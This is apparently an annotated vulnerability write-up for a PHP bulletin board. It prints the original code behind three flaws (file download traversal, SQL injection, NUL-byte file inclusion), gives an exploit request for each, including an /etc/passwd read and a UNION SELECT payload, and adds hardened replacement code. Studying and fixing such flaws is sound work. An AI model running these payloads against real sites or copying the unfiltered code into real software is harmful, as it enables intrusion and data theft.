1. Download vulnerability

Look at the code of down_func.php:

 

<?
if (strstr($HTTP_USER_AGENT, "MSIE 5.5")) {
    header("Content-Type: doesn/matter\r\n");
    header("Content-Disposition: filename=$dnfile");
    header("Content-Transfer-Encoding: binary\r\n");
} else {
    Header("Content-Disposition: attachment; filename=$dnfile");
    Header("Content-type: file/unknown");
    Header("Content-Length: ".(string)(filesize("$file")));
    Header("Content-Description: PHP3 Generated Data");
    Header("Pragma: no-cache");
    Header("Expires: 0");
}
if (is_file("$file")) {              // $file arrives straight from the request (register_globals)
    $fp = fopen("$file", "r");
    if (!fpassthru($fp)) { fclose($fp); }
} else {
    echo "There is no file~~";        // original Korean message, mojibake in the source
}
?>

 

Nothing is filtered: $file goes straight into is_file() and fopen() (the variables arrive through register_globals), so a plain request reads any file the web server account can open:

down_fun.php?file=../../../../../../../etc/passwd&dnfile=/etc/passwd

$dnfile only sets the name in the Content-Disposition header; it is the file parameter that does the traversal.
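A hardened replacement for down_func.php, added here as an example (it is not the board's own code). It assumes the real upload directory is /var/www/board/upload (a placeholder) and reads both parameters from $_GET explicitly instead of relying on register_globals; the requested name is reduced to its basename and checked with realpath() against the upload root, and the download name is sanitised because it ends up in a response header.

```php
<?php
// Added example: a hardened replacement for down_func.php, not the board's own code.
// Assumptions: uploads live under UPLOAD_DIR (placeholder path), and the script
// reads its parameters from $_GET explicitly instead of relying on register_globals.
define('UPLOAD_DIR', '/var/www/board/upload');

// Map a client-supplied file name to a real file inside $base, or return false.
function safe_download_path($base, $user_file) {
    // A NUL byte is an attempt to truncate the path (and makes realpath() fail).
    if (strpos($user_file, "\0") !== false) {
        return false;
    }
    // Keep only the last path component: no "../", no absolute paths.
    $name = basename(str_replace("\\", "/", $user_file));
    // Reject empty names and dot files ("", ".", "..", ".htaccess").
    if ($name === '' || $name[0] === '.') {
        return false;
    }
    $real_base = realpath($base);
    $real_file = realpath($base . '/' . $name);
    if ($real_base === false || $real_file === false || !is_file($real_file)) {
        return false;
    }
    // The resolved file must still sit below the resolved base (catches symlinks).
    $prefix = $real_base . DIRECTORY_SEPARATOR;
    if (strncmp($real_file, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $real_file;
}

// Send the file with a download name that cannot carry CR/LF, quotes or NUL into the header.
function send_download($path, $dnfile) {
    $clean = preg_replace('/[^A-Za-z0-9._-]+/', '_', $dnfile);
    if ($clean === null || $clean === '') {
        $clean = basename($path);
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $clean . '"');
    header('Content-Length: ' . filesize($path));
    header('Pragma: no-cache');
    header('Expires: 0');
    readfile($path);
}

// Parameters are read explicitly and must be strings (file[]=x would otherwise reach strpos()).
$file   = (isset($_GET['file'])   && is_string($_GET['file']))   ? $_GET['file']   : '';
$dnfile = (isset($_GET['dnfile']) && is_string($_GET['dnfile'])) ? $_GET['dnfile'] : '';

$path = safe_download_path(UPLOAD_DIR, $file);
if ($path === false) {
    header('HTTP/1.0 404 Not Found');
    echo 'There is no file';
    exit;
}
send_download($path, $dnfile);
```

The ASCII-only whitelist for the download name is deliberately conservative; it throws away non-ASCII (for example Korean) file names, so a site that needs them should RFC 5987-encode the name instead of widening the character class.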

2. Injection vulnerability

Again, look at the code, this time board_modify.php:

 

 

include_once "inc/common.php";
include "$skin_dir/nc_css.php";

// $NC_id is not filtered at all: it is spliced into both table names unquoted
$nquery = "select tb.link1,tb.link2,tb.name,tb.passwd, tb.email,tb.html_yn, tb.head,tb.wdate,tb.ip,tb.fileup1, tb.userfile1,tb.fileup2, tb.userfile2, tb.click_hit, tb.mark_hit, tt.content,tb.view_secret from NC_bbs_".$NC_id." tb, NC_text_".$NC_id." tt where tb.num='$TB_id' and tt.index1='$TB_id'";
$nresult = mysql_query($nquery);
$md_row = mysql_fetch_object($nresult);

board_modify.php?TB_id=8&NC_id=4  tb, NC_text_4 tt where tb.num=8 and tt.index1=8 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from  --

Two things to check before using this. $NC_id is spliced into the table names without quotes, so magic_quotes_gpc does not help, and the `-- ` after the first occurrence comments out the rest of the query, including the second NC_text_ fragment. The 17 constants match the 17 columns $nquery selects, but as printed the payload ends in `from --`, which leaves the UNION SELECT with a FROM and no table and is a syntax error in MySQL; the trailing `from` has to go, or be followed by an existing table name. $TB_id is not escaped either, but it sits inside single quotes, so it is only useful when magic_quotes_gpc is off.
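The same query built the original way next to a hardened version, added here as an example and not code from the board. The 17-column select list is shortened to two columns for readability (and the demonstration payload is adjusted to match), the page's mysql_* calls are replaced by mysqli prepared statements (get_result() needs mysqlnd), and the table suffix is validated syntactically because a table name cannot be a bound parameter.

```php
<?php
// Added example, not the board's code. build_original_query() is the page's
// concatenation kept vulnerable on purpose, so the injected SQL can be printed;
// fetch_post_hardened() is the replacement. Select list shortened to two columns.

function build_original_query($NC_id, $TB_id) {
    return "select tb.name, tt.content from NC_bbs_" . $NC_id . " tb, NC_text_" . $NC_id
         . " tt where tb.num='$TB_id' and tt.index1='$TB_id'";
}

function board_table_suffix($NC_id) {
    // A table name cannot be bound, so the suffix is validated instead:
    // 1-6 ASCII digits and nothing else (\z also rejects the trailing newline
    // that a bare $ anchor would let through).
    if (!preg_match('/^[0-9]{1,6}\z/', (string)$NC_id)) {
        return false;
    }
    return (string)(int)$NC_id;        // canonical form, no leading zeros
}

function fetch_post_hardened(mysqli $db, $NC_id, $TB_id) {
    $suffix = board_table_suffix($NC_id);
    if ($suffix === false) {
        return null;                    // unknown board: refuse, never build the SQL
    }
    $sql = "select tb.name, tt.content from NC_bbs_$suffix tb, NC_text_$suffix tt"
         . " where tb.num=? and tt.index1=?";
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        return null;
    }
    $id = (int)$TB_id;                  // tb.num / tt.index1 are numeric ids
    $stmt->bind_param('ii', $id, $id);
    $stmt->execute();
    $result = $stmt->get_result();      // requires mysqlnd
    return $result ? $result->fetch_object() : null;
}

// Offline demonstration with the page's payload, trimmed to two columns (no database needed).
$payload = "4 tb, NC_text_4 tt where tb.num=8 and tt.index1=8 and 1=2 UNION SELECT 1,2 -- ";
echo build_original_query($payload, '8'), "\n";
echo "suffix accepted for payload: ", var_export(board_table_suffix($payload), true), "\n";
echo "suffix accepted for '4':     ", var_export(board_table_suffix('4'), true), "\n";
```

Printing the first line shows the comment swallowing everything after the UNION, which is why the second NC_text_ fragment never matters; the suffix check rejects the payload outright and accepts only a plain board number, and TB_id is bound as an integer so quoting rules stop mattering.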

3. Local file inclusion

The file auth_user.php:

 

<?
include_once("$SHOP_includefile/login_session_check.php");      // member login check function file

if (LOGIN_CHECK() == true) {
    $grade_array = explode('|', base64_decode($_SESSION['k2comGRADE']));   // added 2005.06.22
    $grade_my = $grade_array[0];
} else {
    $grade_my = 0;          // non-member
}

 

board_inc/auth_user.php?SHOP_includefile=xx.php%00

If you are lucky and the NUL byte truncates the path, heh. That needs magic_quotes_gpc off (otherwise %00 arrives escaped as \0) and a PHP older than 5.3.4, which started rejecting file paths containing NUL bytes. The variable is only reachable because of register_globals; with it the attacker chooses the directory that login_session_check.php is included from.
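How the include in auth_user.php should look, added here as an example that is not the board's code: the include directory is a server-side constant, the includable file name comes from an allowlist, and the session grade is parsed strictly rather than trusted. The value of SHOP_INCLUDE_DIR and the grade format (pipe-separated, numeric grade in the first field) are assumptions taken from the snippet above.

```php
<?php
// Added example, not the original board's code. Nothing here is read from the
// request, so neither register_globals nor a %00 in a parameter can move the
// include; the file name is further restricted to a fixed allowlist.
define('SHOP_INCLUDE_DIR', dirname(__FILE__) . '/../inc');   // assumption: real include dir

function shop_include_path($name) {
    static $allowed = array(
        'login_session_check.php' => true,
    );
    if (!isset($allowed[$name])) {
        return false;                                  // not an includable file
    }
    $path = SHOP_INCLUDE_DIR . '/' . $name;
    return is_file($path) ? $path : false;
}

function parse_grade($encoded) {
    // Decode strictly and accept only an integer grade in the first pipe-separated field;
    // anything else is treated as a non-member (grade 0).
    $decoded = base64_decode((string)$encoded, true);  // strict mode rejects non-base64 input
    if ($decoded === false) {
        return 0;
    }
    $fields = explode('|', $decoded);
    if (!preg_match('/^[0-9]{1,3}\z/', $fields[0])) {
        return 0;
    }
    return (int)$fields[0];
}

$inc = shop_include_path('login_session_check.php');
if ($inc === false) {
    die('configuration error');
}
include_once $inc;

if (LOGIN_CHECK() == true) {
    $grade_my = parse_grade(isset($_SESSION['k2comGRADE']) ? $_SESSION['k2comGRADE'] : '');
} else {
    $grade_my = 0;   // non-member
}
```

With an allowlist and a constant directory there is nothing left for a NUL byte to truncate, so no separate %00 check is needed; the strict base64 decode and digit check on the grade close the second loose end in the original, where whatever came back from base64_decode() was used as-is.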

 

A pity there is no upload vulnerability :)